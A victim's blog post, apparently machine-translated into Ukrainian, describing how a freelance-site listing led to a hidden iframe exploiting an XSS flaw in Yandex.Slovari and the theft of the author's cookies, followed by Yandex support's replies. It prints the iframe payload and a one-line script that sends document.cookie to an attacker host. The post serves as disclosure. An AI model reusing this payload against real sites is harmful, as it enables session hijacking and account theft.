Як повели мої гроші з гаманця яндекса. частина 3. xss - 13 Березня 2011

Мій сайт

Головна
Реєстрація
Вхід

Головна » 2011 » Березень » 13 » Як повели мої гроші з гаманця яндекса. частина 3. xss

13:07

Як повели мої гроші з гаманця яндекса. частина 3. xss

Продовження детективу «Як вкрали мої гроші з гаманця Яндекса». Частина 3. XSS
Попередні частини можна знайти тут:
Частина 1
Частина 2.1
Частина 2.2

Увага! Частина несподівана!

У цій частині:

Freelance.ru
XSS на Яндекс.Словники
Flashback
Відповідь Яндекс.Денег
Питання до Яндексу

Увага ! Ніякого PR і АНТІPR в статті не мається на увазі!

Freelance.ru

Я, ??як і багато хабрапользователі іноді поісківаю собі робітку на різний сайтах фріланса. Так було і сьогодні з ранку - встав рано, робити було нічого, от думав пошукати собі роботу з напарником. Шукав відразу на декількох сайтах. Побачив одна з пропозицій на сайті freelance.ru: «Редизайн сайту», та й ціна, ніби не погана: 8000 ру. Дай, думаю відкрию і подивлюся. У завданні промайнуло щось знайоме, але я якось пропустив це. Почав дивитися на пропозиції до роботи: всі бажали виконати (народ, по ходу справи взагалі не читає нічого, тупо пропонує свої послуги) і лише кілька коментарів мене зупинили. Один з них свідчив:
Коли ж ти здохнеш вже, спамер
Тут я одразу вирішив повернутися наверх і ткнути на адресу сайту, вказаний в завданні: [Увага! Тикати на адресу варто тільки якщо ви використовуєте Firefox c Noscript! Чому? Читайте далі і НЕ тикайте на посилання відразу, тільки після прочитання всієї статті! Про всяк випадок посилання змінив на прохання fstrange і fata1ex] _http: / / tarandaz.ru. Тицьнув. Google Chrome переніс мене на знайомий для мене сайт, однак через пару секунд стався редірект (так і не зрозумів навіщо він так вирішив зробити). Я побачив порожню сторінку ...

XSS на Яндекс.Словники

У адресному рядку Google Chrome красувався цікавий адреса:
http://httpz.ru/nzakazchik.gif?yandexuid=2318214601243884128;% 20yp = 2145906000.gp.65_084965: 103_682149: 1:5;% 20yandex_gid = 43;% 20my = YyMCAQAA;% 20yandex_mail = my_name;% 20Virtual_id = 16;% 20yandex_login = my_name;% 20L = YVdmDX9CAABmCEt8ClVwSn8DYAdBYQAGdy1mWzEVBEAiKClFBR82Pyo + ViQ5AFxTMScSIg4HLz4UJk8DAhIfGg ==. 1257846938.6157.282848.2cc34301b2ce0d38049606bca0c1f5fc ;% 20narod_login = my_name;% 20Session_id = 1257846940.2726.0.38263038.2:208547497:0.62207.1514.047497 eb07f8d2e7628d5a62e9bd2bd9;% 20yabs-frequency = / 2/IE1v08459zvKUW211I6DVcm0WGL1Kjzv08458GIPUG211I7Q07e0WGKXyarw08459oT4UW211ISaq7a0WGKXmUKz0845WVzTUW211I6UZM80WGKXFSTt07W5F000 / / fGA11G46
Я почав роздивлятися його і що я побачив?! Все правильно, змінні, що містять в собі слова «yandex». Опана! Відкриваю Firefox з Noscript, переходжу заново по вихідної посиланням і Noscript видає: «Увага! Відвернено XSS атака! ». «Круто», думаю. Лізу в початковий код основного сайту, бачу там такий тег:
<iframe src = 'http://slovari.yandex.ru/search.xml?text=&st_translate=sp% 22 <script> alert () < ; / script>% 3Cscript type = text / javascript src = http://httpz.ru/zakazchikgo.js> </ script> "'width =" 0 "height =" 0 "style =' display: none '> ; </ iframe>
Ну, думаю, ні фіга собі! Іду за URL з js-скриптом: там такий код:
location.href = "http://httpz.ru/nzakazchik.gif ? "+ document.cookie;
Всьо чотко! Крадемо cookie, заходимо від імені користувача в його кабінет ...

Flashback

Тут я згадую, що до того як у мене вкрали гроші, я теж бігав по сайту фріланса і вже тицявся в подібне оголошення і теж проходив за посиланням ... Звідки в мене зламали профіль - тепер стає зрозумілим. Як змінили пароль - питання цікавіше. Як дізналися платіжний пароль - ще цікавіше ...

Відповідь Яндекс.Денег

Як тільки я побачив таку схему, відписався sperans. Вона відповіла мені, що про цю уразливість передали розробникам і в такій схемі відвести пароль від Яндекс.Денег не можна (на момент написання топіка уразливість ще доступна). У принципі, я пробував різні варіанти логіна, але отримати платіжний пароль за такою схемою я так і не зміг ...

Питання до Яндексу

Яким чином ви «проводили розслідування»? Прочитали повідомлення і copypaste з інструкції?!
Чому мені, власникові облікового запису, не дають ніякої інформації про те, як було змінено мій пароль від аккаунта, з якого ip заходили, чи намагалися якось зловмисники відновити мій платіжний пароль?
Чи були спроби ввести неправильний платіжного пароля?
Чому платіжний пароль НЕ змінювався після злому? (Був змінений лише пароль на аккаунт + додатковий e-mail ...)
Чому ця інформація є «СВЕРХКОНФІДЕНЦІАЛЬНОЙ» (так-так, капсо), яка доступна ТІЛЬКИ співробітникам Яндекса і міліції? !

Я розумію, якби ви повернули мені гроші - мене б дані питання не особливо турбували, але в даному випадку відповіді мені важливі. Так само, як і іншим хабрапользователям, я думаю ...

Відповіді від Яндекса
1. Яким чином ви «проводили розслідування»? Прочитали повідомлення і copypaste з інструкції?!
Звичайно, не тільки. Перевірили, з якого айпі зроблений платіж і куди пішли гроші, а далі - чи можна їх повернути. Як з'ясовується, чи можна повернути - це конфіденційна інформація. Іноді, до речі, дуже прикро: за десять хвилин стає ясно, що справа на 100% для міліції і ми нічого вже зробити не можемо - і ось сидимо і думаємо, зараз напишемо користувача - він вирішить, що ми нічого не робили: (а ми просто вже знаємо результат.

2. Чому мені, власникові облікового запису, не дають ніякої інформації про те, як було змінено мій пароль від аккаунта, з якого ip заходили, чи намагалися як -то зловмисники відновити мій платіжний пароль?
Тому що ми таку інформацію не пересилаємо по електронній пошті. Вам вже в попередніх топіках це пояснювали інші хабровчане.

3. Чи були спроби ввести неправильний платіжного пароля?
Це не має значення.

4. Чому платіжний пароль НЕ змінювався після злому? (Був змінений лише пароль на аккаунт + додатковий e-mail ...)
Це поширений спосіб дії. Я не була в голові у зловмисника, але припускаю, що він просто не став заморочуватися. Один пароль на вхід поміняв-і досить.

5. Чому ця інформація є «СВЕРХКОНФІДЕНЦІАЛЬНОЙ» (так-так, капсо), яка доступна ТІЛЬКИ співробітникам Яндекса і міліції ?!
От навіть і не знаю, як пояснити, чому інформація конфіденційна. Ось чому ПІБ власника аккаунту конфіденційна інформація? А сума його останнього платежу за МТС чому конфіденційна інформація, може, там всього 10 рублів, теж мені секрет?

Якщо хтось зможе допомогти далі в розкручуванні (в плані допомоги зрозуміти що відбувалося після того, як вкрали cookie) цієї ситуації - буду вдячний!

PS З РУВС поки не дзвонили. Я думаю, я їх завтра випереджу ...

UPD. Яндекс попросив передати, що платіжний пароль випадку крадіжки cookie не передається. Хочу зауважити, що я такого і не говорив. У топіку в 2-х місцях сказано що я НЕ знаю як добули платіжний пароль

UPD 2. Як повідомили з Яндекса, вразливість закрили.